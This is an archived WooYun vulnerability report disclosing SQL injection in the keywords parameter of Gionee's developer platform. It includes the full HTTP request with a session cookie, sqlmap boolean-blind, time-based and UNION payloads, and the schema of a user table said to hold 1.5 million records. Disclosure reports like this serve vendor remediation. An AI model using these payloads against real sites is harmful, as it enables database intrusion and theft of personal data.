乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
RT
漏洞系统:金立开发者平台漏洞地址:
</codGET /application?keywords=%E5%A6%82%E5%BD%B1&status= HTTP/1.1Host: dev.anzhuoapk.comProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36Referer: http://dev.anzhuoapk.com/applicationAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=schun19uqoup3m2o8g0f9nm2l6; Hm_lvt_eac5031a4265d98af4563220293c8e47=1446174018,1446174210,1446175352,1446451177; Hm_lpvt_eac5031a4265d98af4563220293c8e47=1446451190
keywords参数存在注入
---Parameter: keywords (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' AND 4031=4031 AND '%'='&status= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' AND (SELECT * FROM(SELECT(SLEEP(5)))aeuV) AND '%'='&status= Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6271,0x7a5948426a714447456f7566745244524350524750766b55434a494c4576495567427756686c4561,0x716a767a71),NULL,NULL,NULL-- &status=---[16:02:18] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.16back-end DBMS: MySQL 5.0.12
数据库:
DBA权限:
150W用户信息
Database: aorausermanagerdbTable: aouserlistinfo[9 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| Answer1 | varchar(100) || Answer2 | varchar(100) || Birthday | date || Email | varchar(100) || Id | int(11) || Problem1Type | int(11) || Problem2Type | int(11) || Sex | char(1) || UserID | int(11) |+--------------+--------------+
过滤
危害等级:高
漏洞Rank:20
确认时间:2015-11-02 17:28
感谢对金立安全作出的贡献
暂无